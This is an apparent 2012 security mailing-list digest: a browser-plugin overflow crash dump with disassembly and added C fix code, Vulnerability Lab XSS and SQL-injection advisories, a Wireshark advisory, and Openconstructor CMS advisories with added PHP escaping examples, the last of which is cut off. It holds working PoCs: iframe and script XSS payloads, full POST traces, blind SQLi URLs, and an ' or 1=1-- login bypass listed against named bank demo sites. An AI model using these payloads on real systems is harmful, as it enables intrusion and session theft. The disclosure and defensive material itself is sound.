A 1  SS 0023 32bit 0()
Z 0  DS 0023 32bit 0()
S 1  FS 003B 32bit 7FFDD000(4000)
T 0  GS  NULL
D 0
O 0  LastErr  ERROR_SUCCESS
EFL 0297 (NO,B,NE,BE,S,PE,L,LE)

ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 8.000
ST7 empty 0.250 CONST 1/4.
   3 2 1 0  E S P U O Z D I
FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0 (LT)
FCW 027F  Prec NEAR,53  Mask1 1 1 1 1 1
Last cmnd 001B:10571FBD xul.10571FBD

XMM0    
XMM1 61616161 61616161 61616161 61616161
XMM2 61616161 61616161 61616161 61616161
XMM3 61616161 61616161 61616161 61616161
XMM4 61616161 61616161 61616161 61616161
XMM5 61616161 61616161 61616161 61616161
XMM6 61616161 61616161 61616161 61616161
XMM7 61616161 61616161 61616161 61616161
P U O Z D I
MXCSR 1F80  FZ 0 DZ 0  Err  0 0 0 0 0 0
Rnd NEAR   Mask 1 1 1 1 1 1

EIP is overwritten, also EDX points to user-supplied code (this can 
be done by setting an overlong fake parameter, see poc).

As attachment, proof of concept code.

A copy loop [*] is involved in overwriting a certain memory region. The
subsequent code can be used to call inside this memory region [**].

See npdnupdater2.dll:

CPU Disasm
Address   Hex dump  Command  Comments
01A91C10  /$  55PUSH EBP ; npdnupdater2.01A91C10(guessed Arg1)
01A91C11  |.  56PUSH ESI
01A91C12  |.  8BE9  MOV EBP,ECX
01A91C14  |.  57PUSH EDI
01A91C15  |.  8B7C24 10 MOV EDI,DWORD PTR SS:[ARG.1]
01A91C19  |.  C745 00 9CA2A MOV DWORD PTR SS:[EBP],OFFSET 01A9A29C
01A91C20  |.  8B07  MOV EAX,DWORD PTR DS:[EDI]
01A91C22  |.  33F6  XOR ESI,ESI
01A91C24  |.  8945 04   MOV DWORD PTR SS:[EBP+4],EAX
01A91C27  |.  C645 08 00MOV BYTE PTR SS:[EBP+8],0
01A91C2B  |.  C745 10 0 MOV DWORD PTR SS:[EBP+10],0
01A91C32  |.  66:3977 0ACMP WORD PTR DS:[EDI+0A],SI
01A91C36  |.  7E 3E JLE SHORT 01A91C76
01A91C38  |.  EB 06 JMP SHORT 01A91C40
01A91C3A  |   8D9B  LEA EBX,[EBX]
01A91C40  |  8B4F 0C   /MOV ECX,DWORD PTR DS:[EDI+0C]
01A91C43  |.  8B14B1|MOV EDX,DWORD PTR DS:[ESI*4+ECX]
01A91C46  |.  68 D4A2A901   |PUSH OFFSET 01A9A2D4; /Arg2 = ASCII SRC
01A91C4B  |.  52|PUSH EDX; |Arg1
01A91C4C  |.  E8 E06F   |CALL 01A98C31- ; \npdnupdater2.01A98C31
01A91C51  |.  83C4 08   |ADD ESP,8
01A91C54  |.  85C0  |TEST EAX,EAX
01A91C56  |.  75 15 |JNE SHORT 01A91C6D
01A91C58  |.  8B47 10   |MOV EAX,DWORD PTR DS:[EDI+10]
01A91C5B  |.  8B0CB0|MOV ECX,DWORD PTR DS:[ESI*4+EAX]
01A91C5E  |.  BA 38CCA901   |MOV EDX,OFFSET 01A9CC38 ; ASCII ...
01A91C63  |  8A01  |/MOV AL,BYTE PTR DS:[ECX] - [*]
01A91C65  |.  41||INC ECX
01A91C66  |.  8802  ||MOV BYTE PTR DS:[EDX],AL
01A91C68  |.  42||INC EDX
01A91C69  |.  84C0  ||TEST AL,AL
01A91C6B  |.^ 75 F6 |\JNE SHORT 01A91C63
01A91C6D  |  0FBF4F 0A |MOVSX ECX,WORD PTR DS:[EDI+0A]
01A91C71  |.  46|INC ESI
01A91C72  |.  3BF1  |CMP ESI,ECX
01A91C74  |.^ 7C CA \JL SHORT 01A91C40
01A91C76  |  5FPOP EDI
01A91C77  |.  5EPOP ESI
01A91C78  |.  8BC5  MOV EAX,EBP
01A91C7A  |.  5DPOP EBP
01A91C7B  \.  C2 0400   RETN 4
01A91C7E  CCINT3
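The disassembly above walks the plugin's argument list, matches the name "SRC", and copies its value byte by byte until the NUL with no bound. As an added example that is not AOL's code or the plugin's, here is that pattern written out in C next to a bounded replacement that rejects an overlong value instead of overrunning the buffer. The buffer size, the argument-list struct, the case-sensitive strcmp comparison and the sample values are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed size: the advisory does not state how large the region at
 * 01A9CC38 is, only that an overlong SRC value overruns it. */
#define SRC_BUF_SIZE 32

/* Model of the argument list the disassembly walks: a 16-bit count at
 * [EDI+0A], a name array at [EDI+0C] and a value array at [EDI+10]
 * (assumed to be the argc/argn/argv a browser hands a plugin on creation). */
struct plugin_args {
    int16_t argc;
    const char **argn;
    const char **argv;
};

/* The copy loop at 01A91C63, written out: one byte at a time until the NUL
 * terminator, with no check against the destination size. This is the
 * defect; it is kept for comparison and only ever fed a short, fixed
 * string in this example. */
static void copy_unbounded(char *dst, const char *src)
{
    char c;
    do {
        c = *src++;
        *dst++ = c;
    } while (c != '\0');
}

/* Hardened replacement: measure the value without reading past dst_size
 * bytes, refuse anything that does not fit together with its terminator,
 * and only then copy. Returns 0 on success, -1 if the value is too long. */
static int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len >= dst_size)
        return -1;              /* no room for the value plus NUL */
    memcpy(dst, src, len + 1);
    return 0;
}

/* Walk the argument list looking for "SRC" (the CMP against the string at
 * 01A9A2D4) and store its value with the bounded copy. The comparison
 * helper at 01A98C31 is not shown in the advisory; plain strcmp is assumed.
 * Returns 0 on success, -1 if SRC is absent or too long. */
int store_src_param(const struct plugin_args *args, char *out, size_t out_size)
{
    for (int16_t i = 0; i < args->argc; i++) {
        if (strcmp(args->argn[i], "SRC") == 0)
            return copy_bounded(out, out_size, args->argv[i]);
    }
    return -1;
}

/* Constructed driver: build an argument list whose SRC value is value_len
 * bytes of 'a' (0x61, the byte that filled EIP in the reported crash) and
 * return what store_src_param() makes of it. */
int demo_store(size_t value_len)
{
    static char value[256];
    static char out[SRC_BUF_SIZE];
    const char *names[] = { "WIDTH", "SRC" };
    const char *values[] = { "100", value };
    struct plugin_args args = { 2, names, values };

    if (value_len >= sizeof value)
        return -2;              /* outside what this demo models */
    memset(value, 'a', value_len);
    value[value_len] = '\0';
    return store_src_param(&args, out, sizeof out);
}

int main(void)
{
    char small[SRC_BUF_SIZE];
    copy_unbounded(small, "file.ocp");   /* safe only because the input is short */
    printf("unbounded copy of a short value: %s\n", small);
    printf("8-byte SRC   -> %d (accepted)\n", demo_store(8));
    printf("200-byte SRC -> %d (rejected instead of overrunning)\n", demo_store(200));
    return 0;
}
```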

iAuto Mobile Application 2012 - Multiple Web Vulnerabilities

2012-08-06 Thread Vulnerability Lab
Title:
==
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities


Date:
=
2012-07-11


References:
===
http://www.vulnerability-lab.com/get_content.php?id=658


VL-ID:
=
658


Common Vulnerability Scoring System:

3.5


Introduction:
=
With Internet on mobile devices booming, having a desktop-oriented version is
just not enough anymore. Empower your visitors with content designed for mobile
Web by offering them a mobile version of your classifieds website.
WorksForWeb is offering custom-made mobile frontend addons for our classified
solutions. The mobile version of your website will present all the data of the
regular website in the format optimized for iPhone, Android, iPad, BlackBerry,
Symbian, or other mobile devices. Mobile frontend addon features:

Quick and advanced search,
Browsing,
Tabbed design,
Multi-language interface,
Google Maps,
And much more

Addon is seamlessly integrated with your main website. Your website
automatically detects mobile browsers to redirect mobile visitors to the
mobile-optimized content. Why do you need a mobile gateway to your website?
Because all the market leaders have mobile access, and so should you. The
mobile technology is redefining our future, and you should be one step ahead of
your smaller competitors. Mobile users now make up a large percentage of your
target audience, and their needs to access information easily are important to
address. At this moment, the mobile addon is compatible with classified
solutions of v.5.2 and above. The price of the mobile frontend addon is only
$175. This price includes a free expert installation on your server.

(Copy of the Vendor Homepage: http://www.worksforweb.com/classifieds-software/addons/mobile-addon/ )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple cross site
scripting vulnerabilities in the iAuto Mobile APP for Android, iOS & Blackberry.


Report-Timeline:

2012-07-10: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

1.1
A persistent input validation vulnerability is detected in the iAuto Mobile APP
for Android, iOS (iPhone), Ericsson & Blackberry.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent). The persistent vulnerability is located in
the comments module with the bound vulnerable commentSid parameter. Successful
exploitation of the vulnerability can lead to session hijacking (manager/admin)
or stable (persistent) context manipulation. Exploitation requires low user
interaction & a privileged user account.

Vulnerable Module(s):
[+] Comments  Reply to The Comment Listing

Vulnerable Parameter(s):
[+] commentSid & commentInfo


1.2
Multiple non-persistent cross site scripting vulnerabilities are detected in
the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry.
The vulnerabilities allow remote attackers to hijack website customer, moderator
or admin sessions with medium or high required user interaction or a local low
privileged user account. The bugs are located in the Dealer Search Sellers or
Browse by Make and Model with the bound vulnerable parameters city & path/url.
Successful exploitation can result in account theft, client-side phishing &
client-side content request manipulation. Exploitation requires medium or high
user interaction & no privileged web application user account.


Vulnerable Module(s):
[+] Dealer  Search Sellers  City
[+] Browse by Make and Model  /../ 

Vulnerable Parameter(s):
[+] City
[+] Folder Access Listing


Proof of Concept:
=
1.1
The persistent vulnerabilities can be exploited by remote attackers with a low
privileged user account and with low required user interaction.
For demonstration or reproduce ...


Review:  Add Comments - Listing

div class=addComment
h1Reply to The Comment/h1
div class=pageDescription
div class=commentInfoYou are replying to the comment 
#iframe 
src=iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT
 INJECTED CODE!])' = to= 
listing= #448= span= class=fieldValue fieldValueYear height=900 
width=10002007/span
span class=fieldValue fieldValueMakeAcura/span 



1.2
The client-side cross site scripting vulnerabilities can be exploited by remote
attackers with medium or high required user interaction.
For demonstration or reproduce ...

String: iframe src=http://vuln-lab.com width=1000 height=900 
onload=alert(VulnerabilityLab) 

Dealer  Search Sellers  City

PoC:

Inout Mobile Webmail APP - Multiple Web Vulnerabilities

2012-08-06 Thread Vulnerability Lab
Title:
==
Inout Mobile Webmail APP  - Multiple Web Vulnerabilities


Date:
=
2012-06-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=609


VL-ID:
=
609


Common Vulnerability Scoring System:

3.5


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web
vulnerabilities in the inoutscripts mobile Inoutmail Webmail CMS 2012.


Report-Timeline:

2012-06-08: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the
inoutscripts mobile Inoutmail CMS 2012.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent). Successful exploitation of the vulnerability
can lead to session hijacking (manager/admin) or stable (persistent) context
manipulation. Exploitation requires low user interaction & a privileged user
account. The persistent validation vulnerabilities are located in the new mail
& contacts modules with the bound values to, bcc, cc. The bug can be exploited
by remote attackers. The attacker sends a malicious mail with vulnerable script
code values as content. The admin or customer views the arriving mail and the
persistent script code in the To or Bcc inputs. The context will be executed
(persistent) when the user, customer or admin checks his mails. A privileged
user account can also use the bug to save it persistently for higher privileged
user account exploitation.

Vulnerable Module(s):
[+] New Mail
[+] Contacts

Vulnerable Parameter(s):
[+] To
[+] Cc
[+] Bcc


Proof of Concept:
=
The persistent vulnerabilities can be exploited by remote attackers with low
required user interaction. For demonstration or reproduce ...

Insert the demonstration string into the Bcc, Cc & To of the send new mail.
The second possibility is to send a mail from outside to the inout webmail with
the string code values.

PoC:
iframe src=http://vuln-lab.com onload=alert(VL) 


Risk:
=
The security risk of the persistent input validation vulnerabilities is
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - snup (s...@vulnerability-lab.com)
[http://snup1.blogspot.com]


Copyright © 2012 | Vulnerability Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com




[ MDVSA-2012:125 ] wireshark

2012-08-06 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:125
 http://www.mandriva.com/security/
 ___

 Package : wireshark
 Date: August 6, 2012
 Affected: 2011., Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities were found and corrected in Wireshark:
 
 It may be possible to make Wireshark crash by injecting a malformed
 packet onto the wire or by convincing someone to read a malformed
 packet trace file (CVE-2012-4048).
 
 It may be possible to make Wireshark consume excessive CPU resources
 by injecting a malformed packet onto the wire or by convincing someone
 to read a malformed packet trace file (CVE-2012-4049).
 
 This advisory provides the latest versions of Wireshark (1.4.14,
 1.6.8) which are not vulnerable to these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4048
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4049
 http://www.wireshark.org/security/wnpa-sec-2012-11.html
 http://www.wireshark.org/security/wnpa-sec-2012-12.html
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  

BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability

2012-08-06 Thread Vulnerability Lab
Title:
==
BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability


Date:
=
2012-07-09


References:
===
http://www.vulnerability-lab.com/get_content.php?id=654


VL-ID:
=
654


Common Vulnerability Scoring System:

8.5


Abstract:
=
A Vulnerability-Lab researcher discovered an SQL injection vulnerability in the 
Beneficial Bank Business Banking v4.13.1 CMS.


Report-Timeline:

2012-07-09: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

An Auth Bypass vulnerability is detected in the Beneficial Bank Business Banking 
4.13.1 Content Management System.
Remote attackers without privileged user accounts can execute/inject their own SQL 
commands to compromise the application DBMS.
The vulnerability is located in the login module with the bound vulnerable 
Company ID & Company Password parameters. 
Successful exploitation of the vulnerability results in DBMS (Server) or 
application (Web) compromise & unauthorized 
web application (admin/customer) panel access.

Vulnerable Section(s):
[+] Login

Vulnerable Parameter(s):
[+] User & Pass


Proof of Concept:
=
The login auth bypass vulnerability can be exploited by remote attackers without a 
privileged user account. For demonstration or to reproduce ...

PoC:
user : ' or 1=1--
pass : ' or 1=1--

URL: 
http://www.thebeneficial-ebanking.com/customer_demo/index2.html
https://www.frontrangebankonline.com/customer_demo/index2.html
http://www.libertybaybank.com/customer_demo/index2.html
http://www.fs-bankonline.com/customer_demo/index2.html
http://www.centralstateonline.com/customer_demo/index2.html
http://www.hvbonlinebanking.com/customer_demo/index2.html


Risk:
=
The security risk of the auth bypass vulnerability is estimated as critical.


Credits:

Vulnerability Research Laboratory -  Chokri Ben Achor 
(meis...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com




[CVE-2012-3870] Openconstructor CMS 3.12.0 'createobject.php', 'name' and 'description' parameters Stored Cross-site Scripting vulnerabilities

2012-08-06 Thread lorenzo . cantoni86
###Title###: 
Openconstructor CMS 3.12.0 'createobject.php', 'name' and 'description' 
parameters Stored Cross-site Scripting vulnerabilities


###Affected Software###:
http://www.openconstructor.org/
http://code.google.com/p/openconstructor/downloads/list
http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234


###Description###: 
Openconstructor (formerly known as eSector Solutions Web Constructor) is an 
open source web Content Management System written in PHP. Stored XSS 
vulnerabilities exist on the 'name' and 'description' 
parameters, which are used as properties when creating a new object. Version 
3.12.0 is vulnerable; previous versions may be affected, but they have not been 
tested.


###CVE###
CVE-2012-3870


###Impact###:
Authenticated attackers can plant malicious JavaScript in the web application, 
with the aim of executing it in other users' browsers.

CVSS Base Score: 4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N)


###Credits###: 
Lorenzo Cantoni (lorenzo[dot]cantoni86[at]gmail[dot]com)


###Details###:
When creating a new object in the object section, the application asks to set 
a name and a description for that object.
The application does not escape the HTML tags correctly for these parameters. 
The vulnerability has been tested on an Internet Explorer 7 browser (because 
the application is designed to work with IE). Newer versions of the browser with 
the anti-XSS filter enabled may help to protect users from such attacks.

'createobject.php' contains multiple lines of code (for the various kinds of 
objects) similar to the following:

$obj->name = $_POST['name'];
$obj->description = $_POST['description'];
$result = ObjManager::create($obj);

$obj, with its name and description attributes, is passed to the ObjManager::create() 
function without HTML escaping.

When the user accesses the Object section and lists the objects, an object with a 
malicious name or description will trigger the exploit. Additionally, if the object 
can be published, the exploit can also be triggered in the Sitemap section.


###Proof of Concept###:
Here is a trace of the required POST to plant the JavaScript:

POST /openconstructor/objects/createobject.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, application/x-ms-application, 
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: 
http://10.0.2.15/openconstructor/objects/createobject.php?ds_type=htmltext&obj_type=htmltextbody
Accept-Language: it
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 
2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: 10.0.2.15
Pragma: no-cache
Cookie: curnode=htmltextbody; PHPSESSID=s8fnmtbfv0h1ofdeotu4h75p33; 
wcsUserLogin=root; wcsUserName=Administrator
Content-Length: 141

ds_type=htmltext&obj_type=htmltextbody&name=xssed+%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&description=asd&ds_id=3&createobject=Create



###Disclosure###
[08/07/2012] Lead Developer contacted.
[22/07/2012] No response. Sent another mail.
[04/08/2012] Still no response. Public disclosure.


[CVE-2012-3872] Openconstructor CMS 3.12.0 Multiple Reflected Cross-site Scripting vulnerabilities

2012-08-06 Thread lorenzo . cantoni86
###Title###: 
Openconstructor CMS 3.12.0 Multiple Reflected Cross-site Scripting 
vulnerabilities


###Affected Software###:
http://www.openconstructor.org/
http://code.google.com/p/openconstructor/downloads/list
http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234


###Description###: 
Openconstructor (formerly known as eSector Solutions Web Constructor) is an 
open source web Content Management System written in PHP. Multiple Reflected 
XSS vulnerabilities exist on different parameters of different pages. 
Version 3.12.0 is vulnerable; previous versions may be affected, but they have 
not been tested.


###CVE###
CVE-2012-3872


###Impact###: 
Attackers can execute malicious JavaScript in authenticated users' browsers, 
through social engineering techniques.

CVSS Base Score: 4.0 (AV:N/AC:H/Au:N/C:P/I:P/A:N)


###Credits###:
Lorenzo Cantoni 


###Details###:
Vulnerabilities have been tested on Internet Explorer 7, as the application is 
designed to work with that browser. Newer versions of the browser with the 
anti-XSS filter enabled may help to protect users from such attacks.


###Proof of Concept###:

1) 
http://hostname/openconstructor/data/file/edit.php?result=<script>alert('xss')</script>&id=new&ds_id=8&hybridid=&fieldid=&callback=&type=txt&name=test&description=test&fname=test&create=Save

Note: The right 'ds_id' must be set for an existing object. 

2) 
http://hostname/openconstructor/confirm.php?q=<script>alert('XSS')</script>&skin=metallic

3) 
http://hostname/openconstructor/users/users.php?type=multiple&keyword=<script>alert('xss')</script>


###Disclosure###
[08/07/2012] Lead Developer contacted.
[22/07/2012] No response. Sent another mail.
[04/08/2012] Still no response. Public disclosure.


[CVE-2012-3871] Openconstructor CMS 3.12.0 'data/hybrid/i_hybrid.php', 'header' parameter Stored Cross-site Scripting Vulnerability

2012-08-06 Thread lorenzo . cantoni86
###Title###: 
Openconstructor CMS 3.12.0 'data/hybrid/i_hybrid.php', 'header' parameter 
Stored Cross-site Scripting Vulnerability


###Affected Software###:
http://www.openconstructor.org/
http://code.google.com/p/openconstructor/downloads/list
http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234


###Description###: 
Openconstructor (formerly known as eSector Solutions Web Constructor) is an 
open source web Content Management System written in PHP. A stored XSS 
vulnerability exists on the 'header' parameter passed to the 'i_hybrid.php' page, 
which is used when creating a new document in the catalogue section. 
Version 3.12.0 is vulnerable; previous versions may be affected, but they have 
not been tested.


###CVE###
CVE-2012-3871


###Impact###: 
Authenticated attackers can plant malicious JavaScript in the web application, 
with the aim of executing it in other users' browsers.

CVSS Base Score: 4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N)


###Credits###: 
Lorenzo Cantoni


###Details###:
When creating a new document in the catalogue section, the application asks to 
set a name for that object.
The application does not escape the HTML tags correctly for these parameters. 
The vulnerability has been tested on an Internet Explorer 7 browser (because 
the application is designed to work with IE). Newer versions of the browser with 
the anti-XSS filter enabled may help to protect users from such attacks.

'data/hybrid/i_hybrid.php' contains the following code:

$doc->readValues($_POST);
$doc->readFiles($_FILES);
$ds->createDocument($doc);


readValues() does not escape dangerous HTML characters, so they are passed to 
createDocument(), which stores all the attributes in the database.

When the user reaches the main 'Catalogue' section, the XSS is triggered.


###Proof of Concept###:
Here is a trace of the required POST to plant the JavaScript:

POST /openconstructor/data/hybrid/i_hybrid.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, application/x-ms-application, 
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: 
http://10.0.2.15/openconstructor/data/hybrid/edit.php?0=-1&id=new&ds_id=11
Accept-Language: it
Content-Type: multipart/form-data; 
boundary=---7dc262a2803fa
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 
2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: 10.0.2.15
Pragma: no-cache
Cookie: curnode=12; vf[img_intro]=disabled; def_bs0=rating; dsh=11; 
PHPSESSID=s8fnmtbfv0h1ofdeotu4h75p33; wcsUserLogin=root; 
wcsUserName=Administrator
Content-Length: 857

-7dc262a2803fa
Content-Disposition: form-data; name=action

create_hybrid
-7dc262a2803fa
Content-Disposition: form-data; name=ds_id

11
-7dc262a2803fa
Content-Disposition: form-data; name=id

new
-7dc262a2803fa
Content-Disposition: form-data; name=hybridid


-7dc262a2803fa
Content-Disposition: form-data; name=fieldid


-7dc262a2803fa
Content-Disposition: form-data; name=callback


-7dc262a2803fa
Content-Disposition: form-data; name=header

<script>alert('xss')</script>
-7dc262a2803fa
Content-Disposition: form-data; name=published

0
-7dc262a2803fa--




###Disclosure###
[08/07/2012] Lead Developer contacted.
[22/07/2012] No response. Sent another mail.
[04/08/2012] Still no response. Public disclosure.
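
As an added example (not Openconstructor's code), the following PHP renders the fields that the createobject.php (name, description) and i_hybrid.php (header) advisories above store unescaped, first raw and then through an output-escaping helper; the function names are hypothetical and the record is constructed from the PoC payload.

```php
<?php
// Added example, not Openconstructor's code: the values that createobject.php
// (name, description) and i_hybrid.php (header) save unescaped, rendered first
// raw and then through an output-escaping helper. Function names are hypothetical.

declare(strict_types=1);

// Vulnerable rendering: whatever was stored is echoed straight into the object
// list, so a stored <script> runs for every user who opens that section.
function renderRowUnsafe(array $obj): string
{
    return '<tr><td>' . $obj['name'] . '</td><td>' . $obj['description'] . '</td></tr>';
}

// Hardened rendering: escape at the output boundary, for every field that
// originated from a request. ENT_QUOTES also stops breaking out of attributes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderRowSafe(array $obj): string
{
    return '<tr><td>' . h($obj['name']) . '</td><td>' . h($obj['description']) . '</td></tr>';
}

// Regression check for the test suite: no raw tag from user data may survive
// into the rendered markup.
function containsRawTag(string $html, string $tag): bool
{
    return stripos($html, '<' . $tag) !== false;
}

// Constructed record mirroring the advisory's POST body (name carries the payload).
$obj = ['name' => "xssed <script>alert('xss')</script>", 'description' => 'asd'];

$unsafe = renderRowUnsafe($obj);
$safe   = renderRowSafe($obj);

if (!containsRawTag($unsafe, 'script') || containsRawTag($safe, 'script')) {
    throw new RuntimeException('escaping check failed');
}
echo $safe, PHP_EOL;
```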


[CVE-2012-3873] Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities

2012-08-06 Thread lorenzo . cantoni86
###Title###: 
Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities


###Affected Software###:
http://www.openconstructor.org/
http://code.google.com/p/openconstructor/downloads/list
http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234


###Description###: 
Openconstructor (formerly known as eSector Solutions Web Constructor) is an 
open source web Content Management System written in PHP.
Multiple SQL injection vulnerabilities exist on the 'id' parameter, which is 
used across different sections of the application. 
Version 3.12.0 is vulnerable; previous versions may be affected, but they have 
not been tested.

###CVE###
CVE-2012-3873


###Impact###: 
Authenticated attackers can execute arbitrary SQL queries.

CVSS Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)


###Credits###:
Lorenzo Cantoni 


###Details###:
The following lines of code are the cause of the issue:

ds->get_record($_GET['id'])

get_record() performs a query on the database without checking the user-
supplied data in the 'id' parameter. The following pages are vulnerable:

data/gallery/edit.php
data/guestbook/edit.php
data/file/edit.php
data/htmltext/edit.php
data/publication/edit.php
data/event/edit.php

'getimage/showimage.php' is also vulnerable, due to the following lines of code:

$res = $db->query(
'SELECT id, name, filename, size, type, date'.
' FROM dsfile'.
' WHERE id='.$_GET['id']
);


###Proof of Concept###:
An object (e.g. a gallery object, file object, guestbook object ...) must first be 
created, or has to already exist, in order to exploit the vulnerability.
For instance, if a guestbook object has been created, an attacker can open it 
in the edit page and exploit a blind SQL injection as follows:

http://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 
#returns a TRUE value for the query
http://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 
#returns a FALSE value for the query

In my test environment, I have been able to confirm the possibility to execute 
queries with the following commands:

http://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND 
(select @@version)='5.5.16-log' #returns a TRUE value for the query
http://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND 
(select @@version)='5.5.16-foo' #returns a FALSE value for the query

On 'getimage/showimage.php', an image file must be first successfully uploaded. 
The exploitation is very similar:

http://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-foo'
 # returns a FALSE value for the query
http://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-log'
 # returns a TRUE value for the query


###Disclosure###
[08/07/2012] Lead Developer contacted.
[22/07/2012] No response. Sent another mail.
[04/08/2012] Still no response. Public disclosure.
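
As an added example (not Openconstructor's code), the following PHP puts the showimage.php concatenation beside a validated, parameterised version and runs both against an in-memory SQLite table standing in for 'dsfile'; it assumes the pdo_sqlite extension is available, and the function names are hypothetical.

```php
<?php
// Added example, not Openconstructor's code: the showimage.php query beside a
// parameterised version, run against an in-memory SQLite table standing in for
// 'dsfile'. Requires the pdo_sqlite extension; function names are hypothetical.

declare(strict_types=1);

function openDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:', null, null,
        [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE dsfile (id INTEGER PRIMARY KEY, name TEXT,'
        . ' filename TEXT, size INTEGER, type TEXT, date TEXT)');
    $db->exec("INSERT INTO dsfile VALUES (1, 'logo', 'logo.png', 1024, 'image/png', '2012-08-01')");
    return $db;
}

// Vulnerable: the raw 'id' value is spliced into the SQL text, so whatever
// follows the number is parsed as part of the WHERE clause.
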